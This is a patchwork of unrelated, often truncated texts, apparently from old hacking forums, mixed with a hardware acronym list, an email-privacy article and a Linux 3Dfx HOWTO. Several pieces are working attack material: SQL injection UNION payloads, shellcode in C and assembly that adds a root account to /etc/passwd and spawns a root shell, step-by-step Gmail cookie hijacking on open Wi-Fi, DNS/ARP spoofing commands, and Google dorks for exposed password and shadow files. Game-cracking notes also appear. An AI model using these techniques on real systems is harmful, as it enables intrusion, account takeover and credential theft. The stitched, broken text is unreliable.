NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology
What is DNS Spoofing ?

DNS Spoofing is the art of making a DNS entry to point to an another IP
than it would be supposed to point to. To understand better, let's see
an example.You're on your web browser and wish to see the news on, without to think of it, you just enter this URL in your
address bar and press enter.
Now, what's happening behind the scenes
? Well... basically, your browser is going to send a request to a DNS
Server to get the matching IP address for, then the DNS
server tells your browser the IP address of CNN, so your browser to
connect to CNN's IP address and display the content of the main page.
on a minute... You get a message saying that CNN's web site has closed
because they don't have anymore money to pay for their web site. You're
so amazed, you call and tell that to your best friend on the phone, of
course he's laughing at you, but to be sure, he goes to CNN web site to
check by himself.
You are surprised when he tells you he can see the
news of the day as usual and you start to wonder what's going on. Are
you sure you are talking to the good IP address ?Let's check. You ask
your friend to fire up his favorite DNS resolving tool and to give you
the IP address he's getting for you got it, you put it
in your browser URL bar :

You feel ridiculous and frustrated when you see CNN's web page with its
daily news.
you've just been the witness of a DNS hijacking scenario. You're
wondering what happened, did the DNS Server told you the wrong IP
address ? Maybe... At least this is the most obvious answer coming to
our mind.
In fact there are two techniques for accomplishing this DNS hijacking.
Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

you can imagine, a DNS server can't store information about all
existing names/IP on the net in its own memory space.That's why DNS
server have a cache, it enables them to keep a DNS record for a while.
fact, A DNS Server has the records only for the machines of the domain
it has the authority, if it needs to know about machines out of his
domain, it has to send a request to the DNS Server which handles these
machines and since it doesn't want to ask all the time about records,
it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS Server.
attacker his running is own domain ( with his own hacked
DNS Server( . Note that I said hacked DNS Server
because the attacker customized the records in his own DNS server, for
instance one record could be
1) The attacker sends a request to your DNS Server asking it to resolve
2) Your DNS Server is not aware of this machine IP address, it doesn't
belongs to his domain, so it needs to asks to the responsible name
3) The hacked DNS Server is replying to your DNS server,
and at the same time, giving all his records (including his record
concerning Note : this process is called a zone transfer.
4) The DNS server is not "poisoned".The attacker got his IP, but who
cares, his goal was not to get the IP address of his web server but to
force a zone transfer and make your DNS server poisoned as long as the
cache will not be cleared or updated.
5) Now if you ask your DNS
server, about IP address it will give you,
where the attacker run his own web server. Or even simple, the attacker
could just run a bouncer forwarding all packets to the real web site
and vice versa,so you would see the real web site, but all your traffic
would be passing through the attacker's web site.

2) DNS ID Spoofing

saw that when a machine X wants to communicate with a machine Y, the
former always needs the latter IP address. However in most of cases, X
only has the name of Y, in that case, the DNS protocol is used to
resolve the name of Y into its IP address.
Therefore, a DNS request
is sent to a DNS Server declared at X, asking for the IP address of the
machine Y. Meanwhile, the machine X assigned a pseudo random
identification number to its request which should be present in the
answer from the DNS server.Then when the answer from the DNS server
will be received by X, it will just have to compare both numbers if
they're the same, in this case, the answer is taken as valid,otherwise
it will be simply ignored by X.
Does this concept is safe ? Not
completely. Anyone could lead an attack getting this ID number. If
you're for example on LAN, someone who runs a sniffer could intercept
DNS requests on the fly, see the request ID number and send you a fake
reply with the correct ID number... but with the IP address of his
choice.Then, without to realize it, the machine X will be talking to
the IP of attacker's choice thinking it's Y.

By the way, the DNS
protocol relies on UDP for requests (TCP is used only for zone
transfers), which means that it is easy to send a packet coming from a
fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't
provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplish this attack.
my example above, the attacker runs a sniffer, intercept the ID number
and replies to his victim with the same ID number and with a reply of
his choice.
In the other hand, even if the attacker intercepted your
request, it will be transmitted to the DNS Server anyway which will
also reply to the request(unless the attacker is blocking the request
at the gateway or carry out ARP cache poisoning which would make the
attack possible on a switched network by the way).
That means that
the attacker has to reply BEFORE the real DNS server, which means that
to succeed this attack, the attacker MUST be on the same LAN so to have
a very quick ping to your machine, and also to be able to capture your

Practical example ( for
testing purposes ONLY)
To see yourself how to hijack a connection from a machine on your local
area network,we can do the followings :
First step :Poison the ARP cache of the victim's machine (tools and explanations
for realizing this task can be found at
Second step :Now, outgoing packets of the target will be redirected to your host,but
you have to forward the traffic to the real gateway, this can be
achieved witha tool like Winroute Pro.
Third step :We then use WinDNSSpoof,
developed by valgasu (
which isa tool that greatly help to carry out DNS ID Spoofing. (Before
to use this tool be sure you have the Winpcap library installed on your
machine, see
run it in the cmd like :
wds -n -i -g 00-C0-26-DD-59-CF -v
will make to point to on the victim's
machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS
Huy guys,

This's just little information I wanna show to u all here. It's about database character encoding used on server. As u know that there are lots of character encoding method used by webmaster out there such as UTF 8, latin1, etc. Each of encoding techniques has its effective way for showing characters in the client machine. What does it mean ?

Okay, suppose that we have webserver with latin1-encoded database. Latin1 will support character from The Americas, Western Europe, Oceania, and much of Africa. Client user will get character/output from webserver normally. But, how if the client is from East -Asian ?? Sure, latin1 encoding technique won't support it. So, what the relation between latin1 encoding and database SQL ?

Well guys...

#1. Let's take one sample vulnerable web : union all select 1,2,3,4,5,6,7,8,9,10/*

#2. Check the database version union all select 1,2,3,version(),5,6,7,8,9,10/*

Look !!
Nothing appear on the screen, why ??
This's because the webserver is using another encoding instead of UTF8. How do we know that it uses UTF8 for encoding ?
I just guess since UTF 8 is generally used by most webserver out there. And how do we resolve this ?

#3. Use another character encoding union all select 1,2,3,convert(version() using latin1),5,6,7,8,9,10/*

Why we should use latin1 not the other character encoding ??
Because latin 1 is the previous character encoding developed on SQL (version 3/4) before UTF8. So, we can guess from here that latin 1 must be used instead of UTF 8.

#4. Yuppy... now the database version could be read on the screen.

Most SQL-injector usually forget about this technique. So, hope u won't forget this after u read my article.
Cheers Liamo. :)
It's not an easy task to find a vulnerable service and find an exploit for it. It's also not easy to defend against users who might want to exploit y
our system, if you are a system administrator. However, writing an exploit by yourself, to convert a news line from bug tracker into a working lockpic
k, is much more difficult. This article is not a guide on writing exploits, nor an overview of popular vulnerabilities. This is a step-by-step guide o
n developing a shellcode, a crucial point of any exploit software. Hopefully, learning how they work will help conscientious and respectable developer
s and system administrators to understand how malefactors think and to defend their systems against them.
How an Exploit Works

Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and examine its source code. Find the most un
intelligible piece of the code; it will be there, for sure. Most probably, you will find a several lines of strange and unrelated symbols; som
ething like this:
char shellcode[] =

This is shellcode, also sometimes referred to as "bytecode." Its content is not a magic word or random symbols. This is a set of low-level machine co
mmands, the same as are in an executable file. This example shellcode opens port 4444 on a local linux box and ties a Bourne shell to it with root pri
vileges. With a shellcode, you can also reboot a system, send a file to an email, etc. The main task for an exploit program is therefore to make this
shellcode work.

Take, for example, a widely known error-buffer overflow. Developers often check data that has been received as input for functions. A simple example{
: } the developer creates a dynamic array, allocates for it 100 bytes, and does not control the real number of elements. All elements that are out of
the bounds of this array will be put into a stack, and a so-called buffer overflow will occur. An exploit's task is to overflow a buffer and, after t
hat, change the return address of system execution to the address of the shellcode. If a shellcode can get control, it will be executed. It's pretty s

As I already said, this article is not a guide for writing exploits. There are many repositories with existing shellcodes (, Metasploit)
; however, it is not always enough. A shellcode is a low-level sequence of machine commands closely tied to a dedicated processor architecture and
operating system. This is why understanding how it works can help prevent intrusions into your environment.
What Is It For?

To follow along, I expect you to have at least minimal assembly knowledge. As a platform for experiments, I chose Linux with a 32-bit x86 processor.
Most exploits are intended for Unix services; therefore, they are of most interest. You need several additional tools: Netwide Assembler (nasm
), ndisasm, and hexdump. Most Linux distributions include these by default.
The Process of Building

Shellcode stubs are usually written in assembler; however, it is easier to explain how one works by building it in C and then rewriting the same
code in assembly. This is C code for appending a user into /etc/passwd:

main() {
char *filename = "/etc/passwd";
char *line = "hacker:x:0:0::/:/bin/sh\n";
int f_open;
f_open = open(filename,O_WRONLY|O_APPEND);
write(f_open, line, strlen(line));

All of the code is pretty simple, except maybe the open() function. The constant O_WRONLY|O_APPEND given as a parameter opens the file fact for writi
ng and appends the new data to the end of the file.

Here is a more usable example: executing a Bourne shell:

main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
setreuid(0, 0);
execve(name[0],name, NULL);

The setreuid(0,0) call attempts to obtain root privileges (if it is possible). execve(const char filename,const char[] argv, const char[{
] } envp) is a main system call that executes any binary file or script. It has three parameters: filename is a full path to an executable file,
argv[] is an array of arguments, and envp[] is an array of strings in the format key=value. Both arrays must end with a NULL element.

Now consider how to rewrite the C code given in the first example in assembly. x86 assembly executes system calls with help of a special system inter
rupt that reads the number of the function from the EAX register and then executes the corresponding function. The function codes are in the file /usr
/include/asm/unistd.h. For example, a line in this file, #define __NR_ open 5, means that the function open() has the identification number 5. In a si
milar way, you can find all other function codes: exit() is 1, close() is 6, setreuid() is 70, and execve() is 11. This knowledge is enough to wri
te a simple working application. The /etc/passwd amendment application code in assembly is:
section .data
filename db '/etc/passwd', 0
line db 'hacker:x:0:0::/:/bin/sh',0x0a

section .text
global _start

; open(filename,O_WRONLY|O_APPEND)
mov eax, 5
mov ebx, filename
mov ecx, 1025
int 0x80
mov ebx, eax

; write(f_open, line, 24)
mov eax, 4
mov ecx, line
mov edx, 24
int 0x80

; close(f_open)
mov eax, 6
int 0x80

; exit(0)
mov eax, 1
mov ebx, 0
int 0x80

It's a well-known fact that an assembly program consists of three segments: the data segment, which contains variables; the code segment cont
aining code instructions; and a stack segment, which provides a special memory area for storing data. This example uses only data and code segment
s. The operators section .data and section .text mark their beginnings. A data segment contains the declaration of two char variables: name and li
ne, consisting of a set of bytes (see the db mark in the definition).

The code segment starts from a declaration of an entry point, global _start. This tells the system that the application code starts at the _start lab

The next steps are easy; to call open(), set the EAX register to the appropriate function code: 5. After that, pass parameters for the functi
on. The most simple way of passing parameters is to use the registers EBX, ECX, and EDX. EBX gets the first function parameter, the address of the beg
inning of the filename string variable, which contains a full path to a file and a finishing zero char (most system functions operating with strings d
emand a trailing null). The ECX register gets the second parameter, giving information about file open mode (a constant O_WRONLY|O_APPEND in a numeric
format). With all of the parameters set, the code calls interrupt 0x80. It will read the function code from EAX and calls an appropriate function. Af
ter completing the call, the application will continue, calling write(), close(), and exit() in exactly the same way.
Today i will Teach u how to Sniff Gmail cookies in Unsecured Wireless network using Wifizoo tool in Backtrack 3

1) mkdir /root/Desktop/wifizoo
2) cd /root/Desktop/wifizoo
3) wget
4) tar jxvf wifizoo_black_v1.3.tar.bz2
5) cd /root/Desktop/wifizoo/wifizoo_black_v1.3

Now we'll open the file with kwrite (python script language) and modify it to match with the interface u use. at the row 50 , it will indicate the interface,
as my card is RT 73 Chipset i use rausb0


6) conf.iface = 'rausb0?

then make sure u make ur wifi card in Monitor mode

run this command in another Terminal

7) airmon-ng start rausb0

and then monitor the Access Points

8) airodump-ng rausb0

then come back to 1st terminal

and type this command

9) python -i rausb0 (your Interface)

It can be seen that interface wifizoo launches web port 8000 on the local server and the proxy is available on port 8080.
This will be very useful in the future First, let us connect to wifizoo control panel with firefox:


And here's administrative interface Wifizoo

We get down to business by clicking on "Cookies":

heyyy Wifizoo has captured cookies, you can see the image on a cookie google mail.
Before you can use these cookies, you must configure Firefox to connect through proxy turning locally on port 8080. It is in Edit, Preferences, Network, check on Manual proxy configuration and configure the HTTP proxy on port 8080, then

We can now return to the "Cookies" panel Wifizoo hotel. By clicking on the cookie gmail (all information about the cookie, in blue), wifizoo will automatically build on the currently used proxy on port 8080. The indication "Cookie Set!" shows that the cookie has been forged and can be reused>

Then simply click jump to it will take u to then click mail.

you r done u have Sniffed others cookies.

So never use Unsecure Wireless Networks,

Be secure Stay secure ;)

Author : rez
No need of explanatino any more ,,,

newbis b careful

note :_ plz use proxy to visit any site u get thru search :

filetype:htpasswd htpasswd
intitle:"index of" ".htpasswd" -intitle:"dist" -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurlasslist.txt (para encontrar listas de passwords)
intitle:"index of..etc" passwd
intitle:admin intitle:login
"incorrect syntax near" (sql script error)
intitle:"the page cannot be found" inetmgr (debilidad en iis4)
intitle:index.of ws_ftp.ini
"supplied arguments is not a valid postgresql result" (possible debilidad sql)
_vti_pvt password intitle:index.of (frontpage)
inurl:backup intitle:index.of inurl:admin
"index of /backup"

"index of /admin"
"index of /password"
"index of /mail"
"index of /" +passwd
index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
filetype:config web
gobal.asax index
inurlasswd filetype:txt
inurl:admin filetype:db
allinurl: winnt/system32/ (get cmd.exe)
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.1st
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members or accounts
intitle:"index of" user_carts or user _cart
Tools used:

- OllyDbg + plugins
- ImpREC
- Cheat Engine 5.3
- SnagIt


[1/4] How to use WriteProcessMemory to sniff trainers
[2/4] How to apply the above if game updates and you can't find any working trainers
[3/4] Basic exporting of code-caves and basic functionality of Cheat Engine (auto-assembler, scripting and making a trainer on the fly)
[4/4] Getting rid of stupid egotistic nags of releasers (Myth, DEViANCE etc...), basic UPX unpacking...

All tutorials have as target the game called Sacred from Ascaron, but are meant for any game !

First tutorial:
- I used sheep's mega-trainer as a reference;
* side-note : This is addressed to all sites stating that his trainer is for v1.0; WRONG! It's for v1.02 !!! *
- Olly + WriteProcessMemory and sniffed what it writes to the game;

Second tutorial:
- Explained how sheep's one-sided god mode works;
- Basic exporting of code to clipboard;
- Used SnagIt to get a snapshot of the game code, at "god mode" address;

Third tutorial:
- "Updated" game from v1.02 to v1.8.6
- Purpose : update sheep's trainer for WHINERS (OMG! I can't find a working trainer - guess what, now you can update the sh!t on your own)
- Basic Cheat Engine scripting based on sheep's code-cave;
- On-the-fly trainer making with CE's engine;

Fourth tutorial:
- Myth releases are a pain in the ass;
- They pack their files and add .dlls along with them, .dlls which have as purpose blowing a gay nag in the face of the user :|
- Taught how to use Olly to manage basic UPX unpacking and getting rid of the nag;

BIG n0Tes:
1. Sniffing is for teaching purposes, and is meant to help those who don't have working trainers for updated versions of any game available. If you're caught riping code, you're toasted. We know it when we see it !
2. Excuse any typos or mistakes.
3. Greetz fly out to team Extalia and to sheep for his tremendous work !
When we are talking about protecting email privacy and anonymity we consider that it can be compromised by message interception or an email message contains information that the sender was not intending to pass to the recipient. In this article we will try to explain how email system works, what information can be extracted from regular email message, and how email privacy can be protected.

1. Email privacy - how can it be compromised?

Before we continue with topics on how to protect email privacy, we should understand how the email system works and what are the issues related to email privacy.

How the email system works.
Most common way of sending email is using the ISP (Internet Service Provider) or company mail server. When you click on "send" button, your email software will establish an SMTP (SMTP stands for Simple Mail Transfer Protocol) connection to your email server. Server will attempt to deliver a message directly to your recipient ISP mail server, but in case this server is not accessible at the moment it will deliver the message to the intermediate email server known as MX relay host. After traveling through the MX hosts, message will be delivered to recipient mailbox on his/her ISP mail server. It will be stored there until your recipient retrieves the message using POP (Post Office Protocol) or IMAP (Internet Message Access Protocol) protocol. This is how your email message travels through the Internet from the sender's computer to the recipient's computer. The same way web mail service work, but instead of email software you would need to use web interface to compose or read emails.

How can an email message be intercepted?
Where it can be intercepted? It can be intercepted at each step along the way. Email message is stored on two servers on its way at least: on sender ISP mail server and on recipient ISP mail server. When traveling through the MX hosts, message is stored on each of MX hosts. When your mail is addressed to the bank, investment company, business partners, it can attract attention of IT staff that perform mail server monitoring. And there is nothing that can prevent unscrupulous IT staff with access to the mail server to open and read that message. Other problem is that unauthorized personnel or hackers can have access to the mail server where physical access security and network security are weak.
There is another way to intercept email messages: network traffic interception. In most cases network traffic monitoring is performed by government agencies at ISP level. Email traffic can be rated according to keywords to "suspicious" and stored for later review by government agencies staff – this is how US Carnivore system works.

Email headers anonymity.
When analyzing email message we can get lot of information about its sender. Computer IP address, geographic location, time zone, language preferences, computer LAN name, email software used etc., – all this information can be found in email message. And an important point is that all this info is being passed without sender's knowing about it. Well, what is bad about it, you can ask. This will depend on the way this information can be used. For example, you may not wish your recipient to know that your operating system uses Dutch language as default (e.g. your native language is Dutch), or that you are in Australia now and use one of the local ISPs services. All this information can be easily extracted from the email message headers.
Every email message consists of two parts: message header and message body.
Header part can be compared to a letter envelope. It contains message subject, sender's and recipient's email addresses, date and time message was sent and arrived, lists the points your message went through on its way to recipient. Message headers also contain service information about sender's email software. This information is used to deliver message, and allow tech staff to debug email problems when they occur.

Here is an example message headers:

Received: from [] by; Sat, 21 Nov 2003 12:42:20 –0800 PST
Message-ID: <>
Date: Sat, 21 Nov 2003 12:42:20 -0800 (PST)
From: "Peter J. Smith"
Subject: My Private Message
MIME-Version: 1.0
Content-Type: text/html;charset="GB2312"
X-Mailer: Microsoft Outlook Express 5.00.2615.2000

And here is the information we can extract from the headers (using it to draw a picture of the sender):
Sender IP address: [] points to the sender's computer. Anyone can get further details about ISP (address, phone, fax, email) running a search through the WHOIS databases.
Sender ISP: "" and "" – message was sent using web interface from (further details available at the website)
Senders email software: Microsoft Outlook Express 5.00.2615.2000 (this version's known bugs could be used for sending a troyan to the computer)
Senders local time zone: -0800 (PST) US Pacific coast (points to the geographic location of the computer)
Senders native language: charset="GB2312" – Chinese char set (the user's probably a member of the local Chinese community)

It should be noted, that only three lines in the message headers were explicitly supplied by the sender: "from" address, "to" address and "subject" line. All other data was inserted by email software and intermediate servers. Usually users have no control over these headers, but these headers are the most dangerous for email privacy and contain lot of information about the sender. There is no problem to track the message sender using headers data.

Secure email software.
Using right email software is an important point for email security. If you are using buggy email software you are open to hacker attacks since email message contains your email software vendor and version number. There will be enough info to write a specially formatted (to use your email software security vulnerabilities) message to hung your computer or infect it by Trojan. If somebody suspects you to store confidential information on your computer he/she can try to hack in to get it. All the attacker needs to start is your IP address from email message header. Using security holes in your computer software (new Windows vulnerabilities are published almost daily) attacker can gain full access to your computer and in worst case obtain all your email passwords, banking and investment account data, private correspondence, business data etc. All this horror scenarios are not a myth but today's reality, just search on Google on companies offering spying over the Internet. If your competitors can afford spending hundred dollars to know your secrets you are in danger.

Web bugs.
How can be web browsing related to emailing you may ask? It's simple. Most of email applications are capable to display HTML formatted email messages. This is not different from viewing a regular web page, but the web page is displayed in your email software window, not in a browser. When viewing web pages in your email window you are taking the same risk as when browsing, e.g. you have to deal with cookies, Java Scripts, Java, ActiveX controls, etc. IP anonymity and data interception issues should be taken into consideration as well.

There is one popular spying technique: web bugs. To illustrate how they work let us imagine that you are running some online business and have received an email message (possibly business related) form some unknown person:

Subject: Hello!
How are you?
I'm fine.

To attract your attention your full name or your company name can be written in "Subject" line. You have opened this message, and after reading it and considering it to be spam you through it away. But you have not noticed that the message was HTML formatted, and it contained an image. Dot symbol after the word "fine" was replaced by a small image, and that image was automatically downloaded from some website by your email software when you had opened the message. Now, the email sender after analyzing web server logs can get some information on you: date and time you have read this email, your IP address, operating system, etc.
All this means that your email privacy can be compromised when you simply open an email message, even without replying to it.

2. How to protect your email privacy.
Even if you have nothing to hide it is a good idea to take care of your email privacy. We have developed recommendations on how to make emailing secure and private as much as possible.

2.1 Use encryption to protect your email messages. The only way to protect email messages from the interception is to encrypt them. There are few techniques to do so.

* PGP and S\MIME encryption. Both PGP and S\MIME encryption are used to encrypt message body only, leaving message headers unprotected. PGP and S\MIME can be used if you require end-to-end encryption. Using those methods requires prior agreement between parties, and "public key" exchange should be done before emailing securely.
* SSL encrypted connection to mail server. SSL can be successfully used to encrypt email traffic in the whole. SSL encrypted transport prevents from message headers and message body interception on the way to/from the mail server while sending/receiving email. SSL can be used to effectively protect from intercepting your email traffic by ISP or government agencies.

Please note, PGP and S\MIME do not provide anonymity. Even if you encrypt email messages with PGP or S/MIME the message headers still remain open, and will be transferred in clear text through the Internet. You have to understand that unencrypted "To:", "From:", "Subject:", etc. fields may disclose your identity and can contain confidential information. In addition to PGP or S/MIME, SSL connection
Fake Your IP with SSH Tunnelier & SSH Host Account

Video Guilde Download Link:
File Name: SSH_SOCK_Tunnelier.rar
Size: 2002 KB
Status: Normal Download

First We need to install Bitvise Tunnelier software (required)
And and SSH host Account (or SSH File Save)
- You can download the Tunnelier for FREE at
- Then install it on your PC
Download Link:

- Here I show how to use SSH Sock with a SSH File Save
- That is SSH File Save, open it. With SSH File Save you no need to do anything than run it by click Login
- before using just check what port of the SSH File Save
Click Services and see what port ^^... here is 7210
- OK now run the SSH File Save by click Login
- OK and it said succeeded. (we successfully connected with SSH host account)

Now change your Browser Setting to use with SSH to fake your IP
(we can Minimize the SSH File Save).
- In browser, at SOCKS HOST (Sock IP) must always use:
- And the Port is the SSH Port. Sock type is SOCK5
- Then check our IP after faking at
- And we have done ^^

Remember keep the SSH File Save run and how to know the SSH run or NOT? It's very simple, just look the small icon of the SSH Sock at the Taskbar ...
When you need to remove faking SSH Sock, just simply do as me ... And we have done

This paper assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of The mul instruction may, on the surface, seem mundane, and it's purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand, the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

movl $0x0a,%eax
mul $0x0a

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode? Well, let's think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication. Let's put on our mathematician hats for a second, and consider this, what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it 0's out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it's operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However that's not all, %edx is 0'd now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:

xorl %ebx,%ebx
mul %ebx
push %edx
pushl $0x3268732f
pushl $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al #execve() syscall, doesn't return at all unless it fails, in which case it returns -1
int $0x80

divl %eax # -1 / -1 = 1
int $0x80

Now, we have a 3 byte exit function, where as before it was 5 bytes. However, there is a catch, what if a syscall does return 0? Well in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax anything that will make %eax non-zero. Some people say that exit's are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rather odd error, and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.

Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0x10(%ecx),%eax

This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into it's desitination operand. In it's normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is 0'd and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this, to accomplish the same thing:

xorl %eax,%eax
movb $0x10,%eax

I can hear you saying, but that shellcode is a byte shorter than the leal one, and you're quite right. However, in a real shellcode you may already have to 0 out a register like ecx(or any other register), so the xorl instruction in the leal shellcode isn't counted. Here's an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80

xorl %ebx,%ebx
leal 0x17(%ebx),%al
int $0x80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying but that's only one byte it doesn't make that much of a difference, and you're right, here it doesn't make much of a difference(except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.


I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her.
1. Introduction

This is the Linux 3Dfx HOWTO document. It is intended as a quick
reference covering everything you need to know to install and
configure 3Dfx support under Linux. Frequently asked questions
regarding the 3Dfx support are answered, and references are given to
some other sources of information on a variety of topics related to
computer generated, hardware accelerated 3D graphics.

This information is only valid for Linux on the Intel platform. Some
information may be applicable to other processor architectures, but I
have no first hand experience or information on this. It is only
applicable to boards based on 3Dfx technology, any other graphics
accelerator hardware is beyond the scope of this document.

1.1. Contributors and Contacts

This document would not have been possible without all the information
contributed by other people - those involved in the Linux Glide port
and the beta testing process, in the development of Mesa and the Mesa
Voodoo drivers, or rewieving the document on behalf of 3Dfx and
Quantum3D. Some of them contributed entire sections to this document.

Daryll Strauss did the port, Paul J. Metzger modified the Mesa Voodoo driver (written by David
Bucciarelli for Linux, Brian Paul brianp@RA.AVID.COM
integrated it with his famous Mesa library. With respect to Voodoo
Graphics (tm) accelerated Mesa, additional thanks has to go to Henri
Fousse, Gary McTaggart, and the maintainer of the 3Dfx Mesa for DOS,
Charlie Wallace The folks at 3Dfx,
notably Gary Sanders, Rod Hughes, and Marty Franz, provided valuable
input, as did Ross Q. Smith of Quantum3D. The pages on the Voodoo
Extreme and Operation 3Dfx websites provided useful info as well, and
in some case I relied on the 3Dfx local Newsgroups. The Linux glQuake2
port that uses Linux Glide and Mesa is maintained by Dave Kirsch Thanks to all those who sent e-mail regarding
corrections and updates, and special thanks to Mark Atkinson for
reminding me of the dual cable setup.

Thanks to the SGML-Tools package (formerly known as Linuxdoc-SGML),
this HOWTO is available in several formats, all generated from a
common source file. For information on SGML-Tools see its homepage at

1.2. Acknowledgments

3Dfx, the 3Dfx Interactive logo, Voodoo Graphics (tm), and Voodoo Rush
(tm) are registered trademarks of 3Dfx Interactive, Inc. Glide,
TexUS, Pixelfx and Texelfx are trademarks of 3Dfx Interactive, Inc.
OpenGL is a registered trademark of Silicon Graphics. Obsidian is a
trademark of Quantum3D. Other product names are trademarks of the
respective holders, and are hereby considered properly acknowledged.

1.3. Revision History

Version 1.03
First version for public release.

Version 1.16
Current version v1.16 6 February 1998.

1.4. New versions of this document

You will find the most recent version of this document at

New versions of this document will be periodically posted to the
comp.os.linux.answers newsgroup. They will also be uploaded to various
anonymous ftp sites that archive such information including

Hypertext versions of this and other Linux HOWTOs are available on
